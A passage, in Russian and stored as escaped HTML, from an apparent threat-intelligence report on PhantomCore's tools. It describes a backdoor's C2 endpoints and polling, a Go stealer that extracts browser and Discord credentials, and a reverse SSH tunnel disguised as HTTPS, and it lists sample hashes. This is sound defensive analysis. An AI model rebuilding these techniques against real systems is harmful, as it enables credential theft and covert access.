\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u0443\u0435\u0442 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0439 \u0445\u043e\u0441\u0442 \u0432\u00a0\u043f\u0430\u043d\u0435\u043b\u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Phantom, \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u044f \u043d\u0430\u00a0C2-\u0441\u0435\u0440\u0432\u0435\u0440 GUID \u0438 \u0438\u043c\u044f \u0445\u043e\u0441\u0442\u0430, \u043f\u043e\u043b\u0443\u0447\u0430\u0435\u043c\u043e\u0435 \u0438\u0437\u00a0\u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u043e\u0439 \u043e\u043a\u0440\u0443\u0436\u0435\u043d\u0438\u044f COMPUTERNAME:<\/p>\n<p><code>POST \/api\/clients<\/code><\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/3e8\/c27\/91d\/3e8c2791d09365274682bf18301e5a41.png\" alt=\"JSON \u0441\u00a0\u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0435\u0439 \u043e\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435\" title=\"JSON \u0441\u00a0\u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0435\u0439 \u043e\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435\" width=\"649\" height=\"117\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/3e8\/c27\/91d\/3e8c2791d09365274682bf18301e5a41.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/3e8\/c27\/91d\/3e8c2791d09365274682bf18301e5a41.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>JSON \u0441\u00a0\u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0435\u0439 \u043e\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435<\/figcaption><\/div>\n<\/figure>\n<p>\u0414\u0430\u043b\u0435\u0435 PhantomTaskShell \u043a\u0430\u0436\u0434\u044b\u0435 60\u00a0\u0441\u0435\u043a\u0443\u043d\u0434 \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442 \u0443\u00a0\u043f\u0430\u043d\u0435\u043b\u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Phantom \u043a\u043e\u043c\u0430\u043d\u0434\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435.<\/p>\n<p><code>GET \/api\/clients\/GUID\/commands<\/code><\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/9f6\/eb3\/d45\/9f6eb3d457d4c8b3778c3710fdf33271.png\" alt=\"\u041a\u043e\u0434 \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u043a\u043e\u043c\u0430\u043d\u0434\" title=\"\u041a\u043e\u0434 \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u043a\u043e\u043c\u0430\u043d\u0434\" width=\"1218\" height=\"214\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/9f6\/eb3\/d45\/9f6eb3d457d4c8b3778c3710fdf33271.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/9f6\/eb3\/d45\/9f6eb3d457d4c8b3778c3710fdf33271.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u041a\u043e\u0434 \u0437\u0430\u043f\u0440\u043e\u0441\u0430 \u043a\u043e\u043c\u0430\u043d\u0434<\/figcaption><\/div>\n<\/figure>\n<p>C2-\u0441\u0435\u0440\u0432\u0435\u0440 \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0435\u0442 \u0441\u043f\u0438\u0441\u043e\u043a, \u043a\u0430\u0436\u0434\u044b\u0439 \u044d\u043b\u0435\u043c\u0435\u043d\u0442 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u043d\u0430\u0447\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u0441\u043e \u0441\u0442\u0440\u043e\u043a\u0438 \u00abPending:\u00bb, \u0437\u0430\u00a0\u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u043a\u043e\u043c\u0430\u043d\u0434\u0430 \u0434\u043b\u044f\u00a0\u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/2b7\/51a\/b74\/2b751ab7459963a6c2b018cddec8ca96.png\" alt=\"\u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c\u044b\u0439 \u043e\u0442\u00a0C2\u00a0\u0441\u043f\u0438\u0441\u043e\u043a \u043a\u043e\u043c\u0430\u043d\u0434\" title=\"\u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c\u044b\u0439 \u043e\u0442\u00a0C2\u00a0\u0441\u043f\u0438\u0441\u043e\u043a \u043a\u043e\u043c\u0430\u043d\u0434\" width=\"771\" height=\"111\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/2b7\/51a\/b74\/2b751ab7459963a6c2b018cddec8ca96.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/2b7\/51a\/b74\/2b751ab7459963a6c2b018cddec8ca96.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u041f\u043e\u043b\u0443\u0447\u0430\u0435\u043c\u044b\u0439 \u043e\u0442\u00a0C2\u00a0\u0441\u043f\u0438\u0441\u043e\u043a \u043a\u043e\u043c\u0430\u043d\u0434<\/figcaption><\/div>\n<\/figure>\n<p>\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u044b \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434 PhantomTaskShell \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u043d\u0430\u00a0\u0442\u043e\u0442\u00a0\u0436\u0435 URL \u0432\u00a0JSON.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/d38\/84e\/d4f\/d3884ed4fbf48e2e4fc28d454a796f77.png\" alt=\"JSON \u0441\u00a0\u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0430\u043c\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u044b\" title=\"JSON \u0441\u00a0\u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0430\u043c\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u044b\" width=\"718\" height=\"133\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/d38\/84e\/d4f\/d3884ed4fbf48e2e4fc28d454a796f77.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/d38\/84e\/d4f\/d3884ed4fbf48e2e4fc28d454a796f77.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>JSON \u0441\u00a0\u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0430\u043c\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434\u044b<\/figcaption><\/div>\n<\/figure>\n<p>\u0412\u0441\u0435 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f PhantomTaskShell \u043d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435 \u0436\u0443\u0440\u043d\u0430\u043b\u0438\u0440\u0443\u044e\u0442\u0441\u044f \u0432\u00a0\u0444\u0430\u0439\u043b\u0435 update.log.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/d7f\/2b4\/a37\/d7f2b4a371fa93a72a1ed8d7b109a4d7.png\" alt=\"\u041a\u043e\u043d\u0441\u0442\u0430\u043d\u0442\u044b, \u043f\u0440\u043e\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0435 \u0432\u00a0\u043a\u043e\u0434\u0435 PhantomTaskShell\" title=\"\u041a\u043e\u043d\u0441\u0442\u0430\u043d\u0442\u044b, \u043f\u0440\u043e\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0435 \u0432\u00a0\u043a\u043e\u0434\u0435 PhantomTaskShell\" width=\"623\" height=\"107\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/d7f\/2b4\/a37\/d7f2b4a371fa93a72a1ed8d7b109a4d7.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/d7f\/2b4\/a37\/d7f2b4a371fa93a72a1ed8d7b109a4d7.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u041a\u043e\u043d\u0441\u0442\u0430\u043d\u0442\u044b, \u043f\u0440\u043e\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0435 \u0432\u00a0\u043a\u043e\u0434\u0435 PhantomTaskShell<\/figcaption><\/div>\n<\/figure>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0439 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440:<\/p>\n<p><code>9f9acdd833f3fd7b8bf987a8cc17e9456546fdcbcfe80c3b0dfc57c6f62d3e4b<\/code><\/p>\n<\/li>\n<li>\n<p>PhantomStealer<\/p>\n<p>PhantomStealer<strong>\u00a0\u2014 <\/strong>\u043d\u0430\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0439 \u043d\u0430\u00a0Go \u0441\u0442\u0438\u043b\u0435\u0440, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0439 \u043d\u0430\u00a0\u0441\u0442\u0430\u0434\u0438\u0438 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 (Credential Access). \u041f\u0440\u0435\u0434\u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d \u0434\u043b\u044f\u00a0\u0440\u0430\u0431\u043e\u0442\u044b \u0441\u00a0\u0434\u0430\u043d\u043d\u044b\u043c\u0438 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u043d\u044b\u043c\u0438 \u0432\u00a0\u042f\u043d\u0434\u0435\u043a\u0441 \u0411\u0440\u0430\u0443\u0437\u0435\u0440\u0435, Google Chrome \u0438 Discord. \u041d\u0435\u00a0\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043e\u043f\u0435\u043d\u0441\u043e\u0440\u0441\u043d\u043e\u0439 \u0443\u0442\u0438\u043b\u0438\u0442\u043e\u0439, \u043e\u0434\u043d\u0430\u043a\u043e \u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u0438\u043d\u0441\u0442\u0440\u0443\u043a\u0446\u0438\u044e \u043f\u043e\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044e.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/5e4\/044\/69c\/5e404469c2b7b2030044ef412600187c.png\" alt=\"\u0418\u043d\u0441\u0442\u0440\u0443\u043a\u0446\u0438\u044f \u043f\u043e\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044e \u0441\u0442\u0438\u043b\u0435\u0440\u0430\" title=\"\u0418\u043d\u0441\u0442\u0440\u0443\u043a\u0446\u0438\u044f \u043f\u043e\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044e \u0441\u0442\u0438\u043b\u0435\u0440\u0430\" width=\"1204\" height=\"205\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/5e4\/044\/69c\/5e404469c2b7b2030044ef412600187c.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/5e4\/044\/69c\/5e404469c2b7b2030044ef412600187c.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0418\u043d\u0441\u0442\u0440\u0443\u043a\u0446\u0438\u044f \u043f\u043e\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044e \u0441\u0442\u0438\u043b\u0435\u0440\u0430<\/figcaption><\/div>\n<\/figure>\n<p>\u041f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u044b \u0437\u0430\u043f\u0443\u0441\u043a\u0430:<\/p>\n<ul>\n<li>\n<p>program\u00a0\u2014 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0435 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u0435, \u0434\u0430\u043d\u043d\u044b\u0435 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u043d\u0435\u043e\u0431\u0445\u043e\u0434\u0438\u043c\u043e \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c: \u042f\u043d\u0434\u0435\u043a\u0441 \u0411\u0440\u0430\u0443\u0437\u0435\u0440, Google Chrome, Discord.<\/p>\n<\/li>\n<\/ul>\n<p>\u0412\u0430\u0440\u0438\u0430\u043d\u0442\u044b \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f:<\/p>\n<ul>\n<li>\n<p>c: \u044d\u043a\u0441\u043f\u043e\u0440\u0442 \u0434\u0430\u043d\u043d\u044b\u0445 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438;<\/p>\n<\/li>\n<li>\n<p>d: \u0438\u043c\u043f\u043e\u0440\u0442 \u0434\u0430\u043d\u043d\u044b\u0445 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438.<\/p>\n<\/li>\n<\/ul>\n<p>\u041f\u0440\u0438\u00a0\u044d\u043a\u0441\u043f\u043e\u0440\u0442\u0435 \u0441\u0442\u0438\u043b\u0435\u0440 \u0432\u044b\u0433\u0440\u0443\u0436\u0430\u0435\u0442, \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u044b\u0432\u0430\u0435\u0442 \u0438 \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u0442 \u0434\u0430\u043d\u043d\u044b\u0435 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u043a\u0430\u0436\u0434\u043e\u0433\u043e \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u043c\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f \u0432\u00a0\u043e\u0442\u0434\u0435\u043b\u044c\u043d\u044b\u0439 \u0444\u0430\u0439\u043b, \u0430\u00a0\u0437\u0430\u0442\u0435\u043c \u0443\u043f\u0430\u043a\u043e\u0432\u044b\u0432\u0430\u0435\u0442 \u0434\u0430\u043d\u043d\u044b\u0435 \u044d\u043a\u0441\u043f\u043e\u0440\u0442\u0430 \u0432\u00a0\u0435\u0434\u0438\u043d\u044b\u0439 ZIP\u2011\u0430\u0440\u0445\u0438\u0432:<\/p>\n<ul>\n<li>\n<p>\u042f\u043d\u0434\u0435\u043a\u0441 \u0411\u0440\u0430\u0443\u0437\u0435\u0440\u00a0\u2014 \u0444\u0430\u0439\u043b yandex\u2011udak64.dat;<\/p>\n<\/li>\n<li>\n<p>Google Chrome\u00a0\u2014 \u0444\u0430\u0439\u043b chromecc16.dat;<\/p>\n<\/li>\n<li>\n<p>Discord\u00a0\u2014 \u0444\u0430\u0439\u043b discord\u2011key.dat.<\/p>\n<\/li>\n<\/ul>\n<p>\u041d\u0435\u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440\u043d\u0430\u044f \u0434\u043b\u044f\u00a0\u0441\u0442\u0438\u043b\u0435\u0440\u043e\u0432 \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u0438\u043c\u043f\u043e\u0440\u0442\u0430 \u0434\u0430\u043d\u043d\u044b\u0445, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u0430\u043c\u0438 PhantomStealer<strong> <\/strong>\u0434\u043b\u044f\u00a0\u0443\u0434\u043e\u0431\u0441\u0442\u0432\u0430 \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u0440\u0430\u0431\u043e\u0442\u044b \u0441\u00a0\u0443\u043a\u0440\u0430\u0434\u0435\u043d\u043d\u044b\u043c\u0438 \u0443\u0447\u0435\u0442\u043d\u044b\u043c\u0438 \u0437\u0430\u043f\u0438\u0441\u044f\u043c\u0438.<\/p>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0439 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440:<\/p>\n<p><code>c3d05d7d6e1c50c6bd493fd5613c3204e6beadf8b6e4915cdf2f899fabf86a4e\u00a0<\/code><\/p>\n<\/li>\n<li>\n<p>PhantomProxyLite<\/p>\n<p>PhantomProxyLite\u00a0\u2014 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0439 \u043d\u0430\u00a0\u0441\u0442\u0430\u0434\u0438\u0438 \u0437\u0430\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u044f (Persistence) \u0438 \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044f \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f (Defence Evasion) \u0434\u043b\u044f\u00a0\u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 SSH\u2011\u0442\u0443\u043d\u043d\u0435\u043b\u044f \u043c\u0435\u0436\u0434\u0443 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u043c \u0445\u043e\u0441\u0442\u043e\u043c \u0438 C2-\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c \u0438 \u0443\u0441\u0442\u043e\u0439\u0447\u0438\u0432\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u0432\u00a0\u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0443\u044e \u0441\u0435\u0442\u044c.<\/p>\n<p>PhantomProxyLite \u0444\u0443\u043d\u043a\u0446\u0438\u043e\u043d\u0438\u0440\u0443\u0435\u0442 \u043a\u0430\u043a\u00a0\u0444\u043e\u043d\u043e\u0432\u0430\u044f \u0441\u043b\u0443\u0436\u0431\u0430 \u0441\u00a0\u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c SSHService. \u041f\u0440\u0438\u00a0\u043f\u0435\u0440\u0432\u043e\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0435 \u0433\u0435\u043d\u0435\u0440\u0438\u0440\u0443\u0435\u0442 \u0441\u043b\u0443\u0447\u0430\u0439\u043d\u044b\u0439 \u043d\u043e\u043c\u0435\u0440 \u043e\u0431\u0440\u0430\u0442\u043d\u043e\u0433\u043e (reverse) \u0441\u0435\u0442\u0435\u0432\u043e\u0433\u043e \u043f\u043e\u0440\u0442\u0430 C2-\u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u043f\u0440\u0435\u0432\u044b\u0448\u0430\u044e\u0449\u0438\u0439 12559, \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u0441\u043e\u0445\u0440\u0430\u043d\u044f\u0435\u0442\u0441\u044f \u0432\u00a0\u043a\u043b\u044e\u0447\u0435 \u0440\u0435\u0435\u0441\u0442\u0440\u0430 Windows HKLM\\SOFTWARE\\SSHService \u0438 \u0437\u0430\u043f\u0440\u0430\u0448\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043f\u0440\u0438\u00a0\u043a\u0430\u0436\u0434\u043e\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0435<strong> <\/strong>\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430.<br \/>\u0412\u00a0\u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 C:\\Windows\\Temp \u0441\u043e\u0437\u0434\u0430\u0435\u0442\u0441\u044f \u0444\u0430\u0439\u043b config \u0441\u00a0\u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u043c\u0438 SSH\u2011\u0442\u0443\u043d\u043d\u0435\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0441\u0435\u0442\u0435\u0432\u043e\u0433\u043e \u0442\u0440\u0430\u0444\u0438\u043a\u0430 \u0434\u043e\u00a0C2-\u0441\u0435\u0440\u0432\u0435\u0440\u0430.<\/p>\n<p>\u041d\u0430\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u043c \u0445\u043e\u0441\u0442\u0435 PhantomProxyLite<strong> <\/strong>\u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 \u043a\u043b\u0438\u0435\u043d\u0442 ssh.exe \u0441\u00a0\u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u043c\u0438, \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u043d\u044b\u043c\u0438 \u0432\u00a0\u0444\u0430\u0439\u043b\u0435 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0438 \u0440\u0435\u0435\u0441\u0442\u0440\u0435 Windows, \u0438 \u043f\u043e\u0434\u043d\u0438\u043c\u0430\u0435\u0442 \u043e\u0431\u0440\u0430\u0442\u043d\u044b\u0439 SSH\u2011\u0442\u0443\u043d\u043d\u0435\u043b\u044c \u0434\u043e 443\u00a0\u0441\u0435\u0442\u0435\u0432\u043e\u0433\u043e \u043f\u043e\u0440\u0442\u0430 \u043f\u0440\u043e\u043a\u0441\u0438\u2011\u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u043c\u0430\u0441\u043a\u0438\u0440\u0443\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0441\u0435\u0442\u0435\u0432\u043e\u0439 \u0442\u0440\u0430\u0444\u0438\u043a \u043f\u043e\u0434\u00a0\u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u0435 HTTPS\u2011\u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f.<\/p>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u044b:<\/p>\n<p><code>b701272e20db5e485fe8b4f480ed05bcdba88c386d44dc4a17fe9a7b6b9c026b<\/code><\/p>\n<p><code>611121e4100b60e8644211bdc831144ba8b772d4d40e616864e7a723a9d7bf8<\/code><\/p>\n<p><code>a2be4d9fdba560a4706ff8c4b32f092ef476f203c96e1b4afaf391cfe82aa533<\/code><\/p>\n<\/li>\n<li>\n<p>XenArmor All\u2011In\u2011One Password Recovery Pro<\/p>\n<p>XenArmor All\u2011In\u2011One Password Recovery Pro\u00a0\u2014 \u0443\u0442\u0438\u043b\u0438\u0442\u0430 \u0434\u043b\u044f\u00a0\u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u0432 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0432\u00a0\u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 Windows, \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u043c\u0430\u044f \u043d\u0430\u00a0\u043a\u043e\u043c\u043c\u0435\u0440\u0447\u0435\u0441\u043a\u043e\u0439 \u043e\u0441\u043d\u043e\u0432\u0435. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043d\u0430\u00a0\u0441\u0442\u0430\u0434\u0438\u0438 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 (Credential Access).<\/p>\n<p>\u0414\u043b\u044f\u00a0\u043f\u0440\u0438\u043e\u0431\u0440\u0435\u0442\u0435\u043d\u0438\u044f \u0443\u0442\u0438\u043b\u0438\u0442\u044b \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 PhantomCore \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u0430\u043a\u043a\u0430\u0443\u043d\u0442 \u0441\u043e \u0441\u0442\u0430\u0442\u0443\u0441\u043e\u043c Gold, \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 16\u00a0\u0438\u044e\u043b\u044f 2024\u00a0\u0433\u043e\u0434\u0430 \u043d\u0430\u00a0\u0430\u0434\u0440\u0435\u0441 netu@tuta[.]com. \u0421\u00a0\u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0430 \u0441\u043e\u0432\u0435\u0440\u0448\u0435\u043d\u044b \u0434\u0432\u0435 \u043f\u043e\u043a\u0443\u043f\u043a\u0438: 16\u00a0\u0438\u044e\u043b\u044f 2024\u00a0\u0433\u043e\u0434\u0430 \u043f\u0440\u0438\u043e\u0431\u0440\u0435\u0442\u0435\u043d\u0430 \u0432\u0435\u0440\u0441\u0438\u044f \u0443\u0442\u0438\u043b\u0438\u0442\u044b 2023\u00a0\u0433\u043e\u0434\u0430, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u0430\u044f \u0432\u00a0\u043d\u0430\u0447\u0430\u043b\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u0443\u0435\u043c\u043e\u0439 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u043a\u0438\u0431\u0435\u0440\u0448\u043f\u0438\u043e\u043d\u0430\u0436\u0430, 13\u00a0\u043c\u0430\u044f 2025\u00a0\u0433\u043e\u0434\u0430 \u043f\u0440\u0438\u043e\u0431\u0440\u0435\u0442\u0435\u043d\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u0430\u044f \u0432\u0435\u0440\u0441\u0438\u044f \u0443\u0442\u0438\u043b\u0438\u0442\u044b, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e \u043f\u043b\u0430\u043d\u0438\u0440\u0443\u0435\u043c\u0430\u044f 